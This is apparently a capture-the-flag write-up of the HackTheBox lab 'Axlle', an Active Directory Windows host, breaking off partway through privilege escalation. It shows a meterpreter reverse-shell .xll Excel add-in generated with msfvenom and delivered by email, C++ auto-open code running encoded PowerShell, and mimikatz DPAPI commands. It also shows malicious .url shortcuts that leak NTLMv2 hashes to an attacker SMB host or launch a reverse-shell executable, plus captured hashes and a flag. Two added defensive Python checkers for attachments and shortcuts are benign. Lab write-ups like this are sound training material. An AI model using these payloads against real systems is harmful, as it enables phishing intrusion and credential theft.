Axlle
Recon
On the HTTP web app we see the email address accounts@axlle.htb, so add the domain to /etc/hosts:
└─$ grep axl /etc/hosts
10.10.11.21 axlle.htb mainframe.axlle.htb hostmaster.axlle.htb
DNS (53)
└─$ dig any axlle.htb @10.10.11.21
; <<>> DiG 9.19.21-1-Debian <<>> any axlle.htb @10.10.11.21
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 9957
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 4
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;axlle.htb. IN ANY
;; ANSWER SECTION:
axlle.htb. 600 IN A 10.10.11.21
axlle.htb. 3600 IN NS mainframe.axlle.htb.
axlle.htb. 3600 IN SOA mainframe.axlle.htb. hostmaster.axlle.htb. 261 900 600 86400 3600
axlle.htb. 600 IN AAAA dead:beef::aa32:c39e:cbe5:7d67
axlle.htb. 600 IN AAAA dead:beef::1de
;; ADDITIONAL SECTION:
mainframe.axlle.htb. 3600 IN A 10.10.11.21
mainframe.axlle.htb. 3600 IN AAAA dead:beef::1de
mainframe.axlle.htb. 3600 IN AAAA dead:beef::aa32:c39e:cbe5:7d67
;; Query time: 159 msec
;; SERVER: 10.10.11.21#53(10.10.11.21) (TCP)
;; WHEN: Sun Jun 23 04:54:41 EDT 2024
;; MSG SIZE rcvd: 253
SMB
We are not able to enumerate SMB via a null session or default usernames; the null session is accepted, but every useful query comes back NT_STATUS_ACCESS_DENIED.
└─$ addr=axlle.htb; enum4linux "$addr" | tee enum4linux.log
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Jun 23 05:02:41 2024
=========================================( Target Information )=========================================
Target ........... axlle.htb
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=============================( Enumerating Workgroup/Domain on axlle.htb )=============================
[E] Can't find workgroup/domain
=================================( Nbtstat Information for axlle.htb )=================================
Looking up status of 10.10.11.21
No reply from 10.10.11.21
=====================================( Session Check on axlle.htb )=====================================
[+] Server axlle.htb allows sessions using username '', password ''
==================================( Getting domain SID for axlle.htb )==================================
Domain Name: AXLLE
Domain Sid: S-1-5-21-1005535646-190407494-3473065389
[+] Host is part of a domain (not a workgroup)
====================================( OS information on axlle.htb )====================================
[E] Can't get OS info with smbclient
[+] Got OS info for axlle.htb from srvinfo:
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
=========================================( Users on axlle.htb )=========================================
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED
===================================( Share Enumeration on axlle.htb )===================================
do_connect: Connection to axlle.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on axlle.htb
=============================( Password Policy Information for axlle.htb )=============================
[E] Unexpected error from polenum:
[+] Attaching to axlle.htb using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:AXLLE.HTB)
[+] Trying protocol 445/SMB...
[!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
[E] Failed to get password policy with rpcclient
========================================( Groups on axlle.htb )========================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
====================( Users on axlle.htb via RID cycling (RIDS: 500-550,1000-1050) )====================
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
=================================( Getting printer info for axlle.htb )=================================
Cannot connect to server. Error was NT_STATUS_IO_TIMEOUT
enum4linux complete on Sun Jun 23 05:06:34 2024
HTTP (80)

The backend is an IIS web server.

└─$ curl http://axlle.htb/ -I
HTTP/1.1 200 OK
...
Server: Microsoft-IIS/10.0
Date: Sun, 23 Jun 2024 08:48:27 GMT
Excel
Reading the site:
It looks like we can only send Excel documents, but they may not contain macros.

At first I used the https://github.com/0xflagplz/Xll-Payload-Generator tool to generate
Testing stage:
└─$ msfvenom --platform windows --arch x64 -p windows/x64/exec CMD=calc.exe EXITFUNC=thread -b '\x00\x0A\x0D' -f raw -o test.bin
Found 2 compatible encoders
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 319 (iteration=0)
x64/xor chosen with final size 319
Payload size: 319 bytes
Saved as: test.bin
## Credits: https://stackoverflow.com/a/72784177
The testing stage worked, yay! Then I tried the reverse connection and it worked too!
└─$ msfvenom --platform windows --arch x64 -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.16.75 LPORT=4444 EXITFUNC=thread -b '\x00\x0A\x0D' -f raw -o shell.bin
Found 2 compatible encoders
Attempting to encode payload with 1 iterations of x64/xor
x64/xor failed with A key could not be found for the XOR Encoder encoder.
Attempting to encode payload with 1 iterations of x64/xor_dynamic
x64/xor_dynamic succeeded with size 202552 (iteration=0)
x64/xor_dynamic chosen with final size 202552
Payload size: 202552 bytes
Saved as: shell.bin
But when I sent the email to the user I got nothing back!
## Windows
➜ mkdir temp; py .\XllGen.py -i .\shell.bin -o shell.xll
Directory: ~\VBoxShare\Xll-Payload-Generator
@achocolatechippancake
@bobby4111
Successfully wrote unencrypted data to 'temp/main.cpp'
Generated code saved to 'temp/main.cpp'
Templates written to 'temp'
Successfully compiled to 'shell.xll'
Cleanup: 'temp' folder and its contents removed successfully.
---
## Linux
└─$ swaks --to accounts@axlle.htb --from pwn@axlle.htb --header "Subject: Cat pictures" --body "uwu" --attach @./shell.xll
After some trial and error another tool was suggested: https://github.com/moohax/xllpoc. Clone the project, download a shit ton of C++ build stuff together with the SDK, and edit XLL_POC.cpp:
#include "stdafx.h"
#include <cstdlib>
#include <fstream>
#include <iostream>

// Excel calls xlAutoOpen when it loads the add-in, so whatever runs here
// runs as the user whose Excel opened the .xll.
short __stdcall xlAutoOpen()
{
    system("powershell -e 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");
    return 0;
}
The project generates XLL_POC.dll, which you should rename to XLL_POC.xll, since xll files are essentially dll files...
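The mailbox filter only rejects macros, yet an .xll is a PE DLL that xllrunner executes straight from the Attachments folder. As an added example (not the writeup's code, nor hMailServer's), here is a content-based attachment check a mail gateway could run: it rejects PE images whatever their extension, rejects OOXML workbooks that carry vbaProject.bin, and accepts plain workbooks; the sample inputs are constructed in the block.

```python
"""Content-based check for mailed 'Excel' attachments (added example).

Decision is by file content, not by extension:
  - PE image (MZ + 'PE\\0\\0' at e_lfanew)  -> reject (an .xll/.dll, not a workbook)
  - ZIP-based OOXML with xl/vbaProject.bin   -> reject (macro-enabled workbook)
  - ZIP-based OOXML with xl/workbook.xml     -> accept
  - anything else                            -> reject
"""
import io
import struct
import zipfile


def is_pe_image(data: bytes) -> bool:
    """True if data looks like a Windows PE image (what an .xll really is)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)  # offset of the PE header
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def classify_excel_attachment(data: bytes) -> str:
    """Return 'accept' or 'reject:<reason>' for one attachment body."""
    if is_pe_image(data):
        return "reject:pe-image"        # .xll/.dll, possibly renamed to .xlsx
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return "reject:not-ooxml"       # legacy .xls/.xla or arbitrary bytes
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
    if any(n.lower().endswith("vbaproject.bin") for n in names):
        return "reject:macro-enabled"
    if "xl/workbook.xml" not in names:
        return "reject:not-a-workbook"
    return "accept"


# --- constructed samples (not real files from the box) ---------------------
def _ooxml(extra: dict) -> bytes:
    """Build a minimal OOXML-shaped zip, optionally with extra members."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/workbook.xml", "<workbook/>")
        for name, body in extra.items():
            zf.writestr(name, body)
    return buf.getvalue()


def _fake_pe() -> bytes:
    """MZ stub whose e_lfanew points at a PE signature; not a loadable image."""
    hdr = bytearray(b"MZ" + b"\x00" * 0x3E)
    struct.pack_into("<I", hdr, 0x3C, 0x40)
    return bytes(hdr) + b"PE\x00\x00" + b"\x00" * 16


SAMPLES = {
    "report.xlsx": _ooxml({}),
    "report.xlsm": _ooxml({"xl/vbaProject.bin": b"\x00"}),
    "shell.xll": _fake_pe(),
    "renamed.xlsx": _fake_pe(),   # an add-in renamed to look like a workbook
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(f"{name:14} -> {classify_excel_attachment(body)}")
```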
Reverse Shell (gideon.hamill)
PS C:\> whoami /all
USER INFORMATION
----------------
User Name SID
=================== =============================================
axlle\gideon.hamill S-1-5-21-1005535646-190407494-3473065389-1113
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Log Users Alias S-1-5-32-559 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Group used for deny only
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
AXLLE\Accounts Group S-1-5-21-1005535646-190407494-3473065389-1104 Mandatory group, Enabled by default, Enabled group
AXLLE\Employees Group S-1-5-21-1005535646-190407494-3473065389-1103 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
Upgrade the shell with ConPtyShell for more stability and run winpeas to enumerate the system.
...
╔══════════╣ UAC Status
╚ If you are in the Administrators group check how to bypass the UAC https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access
ConsentPromptBehaviorAdmin: 5 - PromptForNonWindowsBinaries
EnableLUA: 1
LocalAccountTokenFilterPolicy:
FilterAdministratorToken:
[*] LocalAccountTokenFilterPolicy set to 0 and FilterAdministratorToken != 1.
[-] Only the RID-500 local admin account can be used for lateral movement.
╔══════════╣ PowerShell Settings
PowerShell v2 Version: 2.0
PowerShell v5 Version: 5.1.20348.1
PowerShell Core Version:
Transcription Settings:
Module Logging Settings:
Scriptblock Logging Settings:
PS history file: C:\Users\gideon.hamill\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS history size: 319B
...
╔══════════╣ Drives Information
╚ Remember that you should search more info inside the other drives
C:\ (Type: Fixed)(Filesystem: NTFS)(Available space: 2 GB)(Permissions: Users [AppendData/CreateDirectories])
...
╔══════════╣ Checking KrbRelayUp
╚ https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#krbrelayup
The system is inside a domain (AXLLE) so it could be vulnerable.
╚ You can try https://github.com/Dec0ne/KrbRelayUp to escalate privileges
...
╔══════════╣ Home folders found
C:\Users\Administrator
C:\Users\All Users
C:\Users\baz.humphries
C:\Users\brad.shaw : Accounts [AllAccess]
C:\Users\calum.scott
C:\Users\dallon.matrix
C:\Users\dan.kendo
C:\Users\Default
C:\Users\Default User
C:\Users\gideon.hamill : Accounts [AllAccess], gideon.hamill [AllAccess]
C:\Users\jacob.greeny
C:\Users\lindsay.richards : Accounts [AllAccess]
C:\Users\Public : Interactive [WriteData/CreateFiles]
C:\Users\simon.smalls : Accounts [AllAccess]
C:\Users\trent.langdon
...
════════════════════════════════════╣ Processes Information ╠════════════════════════════════════
╔══════════╣ Interesting Processes -non Microsoft-
╚ Check if any interesting processes for memory dump or if you could overwrite some binary running https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#running-processes
...
rundll32(8132)[C:\Windows\system32\rundll32.exe]
Command Line: "C:\Windows\system32\rundll32.exe" c:\windows\system32\ieframe.dll,OpenURL C:\inetpub\testing\priv.url
=================================================================================================
xllrunner(2112)[C:\program files\microsoft office\xllrunner\xllrunner.exe] -- POwn: gideon.hamill
Command Line: "C:\program files\microsoft office\xllrunner\xllrunner.exe" "C:\Program Files (x86)\hMailServer\Data\axlle.htb\Attachments\240620240144597341-XLL_POC_4445.xll"
=================================================================================================
...
╔══════════╣ Modifiable Services
╚ Check if you can modify any service https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
LOOKS LIKE YOU CAN MODIFY OR START/STOP SOME SERVICE/s:
RmSvc: GenericExecute (Start/Stop)
ConsentUxUserSvc_7b331: GenericExecute (Start/Stop)
CredentialEnrollmentManagerUserSvc_7b331: GenericExecute (Start/Stop)
DeviceAssociationBrokerSvc_7b331: GenericExecute (Start/Stop)
DevicePickerUserSvc_7b331: GenericExecute (Start/Stop)
DevicesFlowUserSvc_7b331: GenericExecute (Start/Stop)
PimIndexMaintenanceSvc_7b331: GenericExecute (Start/Stop)
PrintWorkflowUserSvc_7b331: GenericExecute (Start/Stop)
UdkUserSvc_7b331: GenericExecute (Start/Stop)
UnistoreSvc_7b331: GenericExecute (Start/Stop)
UserDataSvc_7b331: GenericExecute (Start/Stop)
WpnUserService_7b331: GenericExecute (Start/Stop)
...
╔══════════╣ Autorun Applications
╚ Check if you can modify other users AutoRuns binaries (Note that is normal that you can modify HKCU registry and binaries indicated there) https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries
Folder: C:\windows\tasks
FolderPerms: Authenticated Users [WriteData/CreateFiles]
=================================================================================================
Folder: C:\windows\system32\tasks
FolderPerms: Authenticated Users [WriteData/CreateFiles]
...
╔══════════╣ Network Shares
ADMIN$ (Path: C:\Windows)
C$ (Path: C:\)
IPC$ (Path: )
NETLOGON (Path: C:\Windows\SYSVOL\sysvol\axlle.htb\SCRIPTS)
SYSVOL (Path: C:\Windows\SYSVOL\sysvol)
WebTesting (Path: C:\inetpub\testing) -- Permissions: AllAccess
...
╔══════════╣ Checking for DPAPI Master Keys
╚ https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dpapi
MasterKey: C:\Users\gideon.hamill\AppData\Roaming\Microsoft\Protect\S-1-5-21-1005535646-190407494-3473065389-1113\2e7f95b7-6930-479a-8df8-ac59abbd261b
Accessed: 6/24/2024 3:06:28 AM
Modified: 6/24/2024 3:06:28 AM
=================================================================================================
MasterKey: C:\Users\gideon.hamill\AppData\Roaming\Microsoft\Protect\S-1-5-21-1005535646-190407494-3473065389-1113\52d1fa8c-4ee4-4b10-940b-ee2bf2d59939
Accessed: 1/1/2024 4:15:54 AM
Modified: 1/1/2024 4:15:54 AM
=================================================================================================
...
╔══════════╣ Checking for DPAPI Credential Files
╚ https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dpapi
CredFile: C:\Users\gideon.hamill\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D
Description: Local Credential Data
MasterKey: 52d1fa8c-4ee4-4b10-940b-ee2bf2d59939
Accessed: 1/1/2024 4:15:54 AM
Modified: 1/1/2024 4:15:54 AM
Size: 11020
=================================================================================================
...
╔══════════╣ Enumerating Security Packages Credentials
Version: NetNTLMv2
Hash: gideon.hamill::AXLLE:1122334455667788:5a5b49070972a5db7aa3c10b497f7760:010100000000000024aa2a2e1ec6da01eb453b8b74c2d6eb0000000008003000300000000000000001000000002000007497a60d8d2660dd079bf7317352d7a79db9a54158fe4ab254d152e774131d730a00100000000000000000000000000000000000090000000000000000000000
...
════════════════════════════════════╣ File Analysis ╠════════════════════════════════════
╔══════════╣ Found PHP_files Files
File: C:\Program Files (x86)\hMailServer\PHPWebAdmin\config-dist.php
...
winpeas showed useful information for us to explore. First I visited the hMailServer directory; the password may come in handy for something?
PS C:\Program Files (x86)\hMailServer\bin> cat hMailServer.INI
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=52a1b2a1211e690998e0d2ccb653ff22
[Database]
Type=MSSQLCE
Username=
Password=52abe4d2e16269ddddf7b166218e92d9
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1
Command to list the shares:
PS C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5> Get-SmbShare
Name ScopeName Path Description
---- --------- ---- -----------
ADMIN$ * C:\Windows Remote Admin
C$ * C:\ Default share
IPC$ * Remote IPC
NETLOGON * C:\Windows\SYSVOL\sysvol\axlle.htb\SCRIPTS Logon server share
SYSVOL * C:\Windows\SYSVOL\sysvol Logon server share
WebTesting * C:\inetpub\testing
Couldn't get the password via the DPAPI cache:
mimikatz # dpapi::masterkey /in:.\2e7f95b7-6930-479a-8df8-ac59abbd261b /rpc
mimikatz # dpapi::masterkey /in:.\52d1fa8c-4ee4-4b10-940b-ee2bf2d59939 /rpc
mimikatz # dpapi::cache
mimikatz # dpapi::cred /in:C:\Users\gideon.hamill\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D
...
**CREDENTIAL**
credFlags : 00000030 - 48
credSize : 00002a46 - 10822
credUnk0 : 00000000 - 0
Type : 00000001 - 1 - generic
Flags : 00000000 - 0
LastWritten : 1/1/2024 12:15:54 PM
unkFlagsOrSize : 00000000 - 0
Persist : 00000002 - 2 - local_machine
AttributeCount : 00000020 - 32
unk0 : 00000000 - 0
unk1 : 00000000 - 0
TargetName : WindowsLive:target=virtualapp/didlogical
UnkData : (null)
Comment : PersistedCredential
TargetAlias : (null)
UserName : 02ibadauxfvernpc
CredentialBlob :
Attributes : 32
...
Enumerate groups:
PS C:\users\public> Get-ADGroup -Properties * -Identity Accounts
CanonicalName : axlle.htb/Users/Accounts
CN : Accounts
Created : 1/1/2024 3:34:49 AM
createTimeStamp : 1/1/2024 3:34:49 AM
Deleted :
Description : Account Managers
DisplayName : Accounts
DistinguishedName : CN=Accounts,CN=Users,DC=axlle,DC=htb
dSCorePropagationData : {1/2/2024 6:35:21 AM, 1/2/2024 6:26:06 AM, 1/2/2024 6:06:50 AM, 1/1/2024 8:08:07 AM...}
GroupCategory : Security
GroupScope : Global
groupType : -2147483646
HomePage :
instanceType : 4
isDeleted :
LastKnownParent :
ManagedBy :
member : {CN=Lindsay Richards,DC=axlle,DC=htb, CN=Simon Smalls,DC=axlle,DC=htb, CN=Gideon Hamill,DC=axlle,DC=htb, CN=Brad Shaw,DC=axlle,DC=htb}
MemberOf : {CN=Employees,CN=Users,DC=axlle,DC=htb}
Members : {CN=Lindsay Richards,DC=axlle,DC=htb, CN=Simon Smalls,DC=axlle,DC=htb, CN=Gideon Hamill,DC=axlle,DC=htb, CN=Brad Shaw,DC=axlle,DC=htb}
Modified : 1/2/2024 6:35:21 AM
modifyTimeStamp : 1/2/2024 6:35:21 AM
Name : Accounts
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory : CN=Group,CN=Schema,CN=Configuration,DC=axlle,DC=htb
ObjectClass : group
ObjectGUID : 2eeaf150-6c9d-4cea-944b-109ce7197596
objectSid : S-1-5-21-1005535646-190407494-3473065389-1104
ProtectedFromAccidentalDeletion : False
SamAccountName : Accounts
sAMAccountType : 268435456
sDRightsEffective : 0
SID : S-1-5-21-1005535646-190407494-3473065389-1104
SIDHistory : {}
uSNChanged : 41252
uSNCreated : 12791
whenChanged : 1/2/2024 6:35:21 AM
whenCreated : 1/1/2024 3:34:49 AM
PS C:\users\public> Get-ADGroup -Properties * -Identity Employees
CanonicalName : axlle.htb/Users/Employees
CN : Employees
Created : 1/1/2024 3:34:49 AM
createTimeStamp : 1/1/2024 3:34:49 AM
Deleted :
Description : Employees of Axlle Corp
DisplayName : Employees
DistinguishedName : CN=Employees,CN=Users,DC=axlle,DC=htb
dSCorePropagationData : {1/2/2024 6:34:14 AM, 1/2/2024 6:26:06 AM, 1/2/2024 6:04:46 AM, 1/1/2024 8:08:07 AM...}
GroupCategory : Security
GroupScope : Global
groupType : -2147483646
HomePage :
instanceType : 4
isDeleted :
LastKnownParent :
ManagedBy :
member : {CN=Web Devs,CN=Users,DC=axlle,DC=htb, CN=App Devs,CN=Users,DC=axlle,DC=htb, CN=Sales,CN=Users,DC=axlle,DC=htb, CN=HR,CN=Users,DC=axlle,DC=htb...}
MemberOf : {}
Members : {CN=Web Devs,CN=Users,DC=axlle,DC=htb, CN=App Devs,CN=Users,DC=axlle,DC=htb, CN=Sales,CN=Users,DC=axlle,DC=htb, CN=HR,CN=Users,DC=axlle,DC=htb...}
Modified : 1/2/2024 6:34:14 AM
modifyTimeStamp : 1/2/2024 6:34:14 AM
Name : Employees
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory : CN=Group,CN=Schema,CN=Configuration,DC=axlle,DC=htb
ObjectClass : group
ObjectGUID : b03a8fbd-02c5-484e-8390-80b9a425818d
objectSid : S-1-5-21-1005535646-190407494-3473065389-1103
ProtectedFromAccidentalDeletion : False
SamAccountName : Employees
sAMAccountType : 268435456
sDRightsEffective : 0
SID : S-1-5-21-1005535646-190407494-3473065389-1103
SIDHistory : {}
uSNChanged : 41239
uSNCreated : 12787
whenChanged : 1/2/2024 6:34:14 AM
whenCreated : 1/1/2024 3:34:49 AM
We are part of the Accounts and Employees groups; Accounts seems to be the account managers.
List connections and process names:
PS C:\Users\gideon.hamill> Get-NetTCPConnection -State Listen | % { $name=(Get-Process -Id $_.OwningProcess).ProcessName; $_ | Add-Member -MemberType NoteProperty -Name ProcessName -Value $name; $_ } | Format-Table -Property LocalAddress, LocalPort, RemoteAddress, RemotePort, State, ProcessName -AutoSize
Still nothing eye-catching...
Privilege Escalation (dallon.matrix)
OSINT Testing
Okay, finally I decided to look at where the xll files were stored, and surprise surprise!
PS C:\Program Files (x86)\hMailServer\Data\axlle.htb> tree /f
Folder PATH listing
Volume serial number is BFF7-F940
C:.
├───accounts
├───Attachments
│ 240620241208526673-shell.xll
│
├───dallon.matrix
│ └───2F
│ {2F7523BD-628F-4359-913E-A873FCC59D0F}.eml
│
└───ReviewedAttachments
240620241205223704-HelloWorldXll.xll
240620241206194486-HelloWorldXll.xll
240620241207403860-XLL_POC_4445.xll
PS C:\Program Files (x86)\hMailServer\Data\axlle.htb> cat '.\dallon.matrix\2F\{2F7523BD-628F-4359-913E-A873FCC59D0F}.eml'
Return-Path: webdevs@axlle.htb
Received: from bumbag (Unknown [192.168.77.153])
by MAINFRAME with ESMTP
; Mon, 1 Jan 2024 06:32:24 -0800
Date: Tue, 02 Jan 2024 01:32:23 +1100
To: dallon.matrix@axlle.htb,calum.scott@axlle.htb,trent.langdon@axlle.htb,dan.kendo@axlle.htb,david.brice@axlle.htb,frankie.rose@axlle.htb,samantha.fade@axlle.htb,jess.adams@axlle.htb,emily.cook@axlle.htb,phoebe.graham@axlle.htb,matt.drew@axlle.htb,xavier.edmund@axlle.htb,baz.humphries@axlle.htb,jacob.greeny@axlle.htb
From: webdevs@axlle.htb
Subject: OSINT Application Testing
Message-Id: <20240102013223.019081@bumbag>
X-Mailer: swaks v20201014.0 jetmore.org/john/code/swaks/
Hi everyone,
The Web Dev group is doing some development to figure out the best way to automate the checking and addition of URLs into the OSINT portal.
We ask that you drop any web shortcuts you have into the C:\inetpub\testing folder so we can test the automation.
Yours in click-worthy URLs,
The Web Dev Team
Save the usernames for later, just in case.
└─$ echo 'dallon.matrix@axlle.htb,calum.scott@axlle.htb,trent.langdon@axlle.htb,dan.kendo@axlle.htb,david.brice@axlle.htb,frankie.rose@axlle.htb,samantha.fade@axlle.htb,jess.adams@axlle.htb,emily.cook@axlle.htb,phoebe.graham@axlle.htb,matt.drew@axlle.htb,xavier.edmund@axlle.htb,baz.humphries@axlle.htb,jacob.greeny@axlle.htb'| tr ',' '\n' > usernames.tld.txt
└─$ echo 'dallon.matrix@axlle.htb,calum.scott@axlle.htb,trent.langdon@axlle.htb,dan.kendo@axlle.htb,david.brice@axlle.htb,frankie.rose@axlle.htb,samantha.fade@axlle.htb,jess.adams@axlle.htb,emily.cook@axlle.htb,phoebe.graham@axlle.htb,matt.drew@axlle.htb,xavier.edmund@axlle.htb,baz.humphries@axlle.htb,jacob.greeny@axlle.htb'| tr ',' '\n' | cut -d '@' -f 1 > usernames.txt
Create the shortcut file:
PS C:\inetpub\testing> echo "[InternetShortcut]`nURL=\\\\10.10.16.75\\uwu" > test.url
Meanwhile, start Responder:
└─$ sudo responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.4.0
...
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.21
[SMB] NTLMv2-SSP Username : AXLLE\dallon.matrix
[SMB] NTLMv2-SSP Hash : dallon.matrix::AXLLE:469b53838a03ba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
[*] Skipping previously captured hash for AXLLE\dallon.matrix
[*] Skipping previously captured hash for AXLLE\dallon.matrix
...
User.txt
Well, the hash couldn't be cracked with rockyou. It turns out you can also open files with the file:// protocol, so let's get a reverse shell:
PS C:\inetpub\testing> echo "[InternetShortcut]`nURL=file:///Users/Public/rev.exe" > test.url
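Both shortcuts work because the OSINT automation hands every dropped .url to OpenURL without looking at the target. As an added defender-side example (not part of the writeup), here is a parser for the InternetShortcut format that allows only http(s) URLs with a host and denies UNC and file:// targets; the sample files are constructed in the block, the first two mirroring the shortcuts above.

```python
"""Validate InternetShortcut (.url) files before an automation opens them.

Added example. A UNC target makes the opening account authenticate to a
remote SMB server (leaking its NetNTLMv2 response); a file:// target runs a
local executable. Only http(s) URLs with a host name are allowed through.
"""
import re
from typing import Optional
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def parse_url_file(text: str) -> Optional[str]:
    """Return the URL= value from the [InternetShortcut] section, or None."""
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section == "internetshortcut" and "=" in line:
            key, value = line.split("=", 1)
            if key.strip().lower() == "url":
                return value.strip()
    return None


def check_shortcut(text: str) -> str:
    """Return 'allow' or 'deny:<reason>' for the body of a .url file."""
    url = parse_url_file(text)
    if url is None:
        return "deny:no-url"
    # A UNC path (\\host\share) has no scheme but OpenURL still follows it
    # and authenticates to the remote SMB server.
    if re.match(r"^[\\/]{2,}", url):
        return "deny:unc-path"
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return f"deny:scheme-{scheme or 'none'}"
    if not parts.hostname:
        return "deny:no-host"
    return "allow"


# constructed samples; the first two mirror the shortcuts used in the writeup
SAMPLES = {
    "unc.url": "[InternetShortcut]\nURL=\\\\10.10.16.75\\uwu\n",
    "local.url": "[InternetShortcut]\nURL=file:///Users/Public/rev.exe\n",
    "ok.url": "[InternetShortcut]\r\nURL=https://example.com/osint\r\n",
    "junk.url": "[InternetShortcut]\nIconIndex=0\n",
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(f"{name:10} -> {check_shortcut(body)}")
```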
---
meterpreter > getuid
Server username: AXLLE\dallon.matrix
meterpreter > shell
Process 4372 created.
Channel 2 created.
Microsoft Windows [Version 10.0.20348.2527]
(c) Microsoft Corporation. All rights reserved.
C:\>cd %USERPROFILE%
C:\Users\dallon.matrix>tree /f
tree /f
Folder PATH listing
Volume serial number is BFF7-F940
C:.
+---Desktop
user.txt
C:\Users\dallon.matrix>type .\Desktop\user.txt
d25c2eb60aa5df291c86f643086c4b87
Privilege Escalation (jacob.greeny)
The user is part of Web Devs, which means we should have access to some development features.
C:\Users\dallon.matrix>whoami /all
User Name SID
=================== =============================================
axlle\dallon.matrix S-1-5-21-1005535646-190407494-3473065389-1125
Group Name Type SID Attributes
========================================== ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Log Users Alias S-1-5-32-559 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Group used for deny only
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
